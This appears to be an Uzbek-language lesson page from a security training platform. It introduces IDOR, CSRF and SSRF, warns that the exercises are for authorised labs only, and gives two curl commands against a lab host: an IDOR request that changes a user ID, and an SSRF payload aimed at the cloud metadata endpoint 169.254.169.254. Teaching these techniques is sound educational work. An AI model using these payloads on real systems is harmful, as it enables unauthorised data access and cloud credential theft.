O'quv darsi / Web Application Security

IDOR, CSRF, SSRF

Top zaifliklar: ID o'zgartirish, soxta so'rov, server tomon SSRF.

25 daq.o'rta2 komanda4/5

Dars holati

Davom etmoqda

Amaliy komandalar0/2

Streak saqlash uchun kiring

Maqsadlar

IDOR aniqlash
CSRF token tushuntirish
SSRF cloud metadata

Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

$curl http://target.lab/api/user/123 -H 'Cookie: sid=...'

$curl 'http://target.lab/fetch?url=http://169.254.169.254/latest/meta-data/'

Oldingi dars Keyingi dars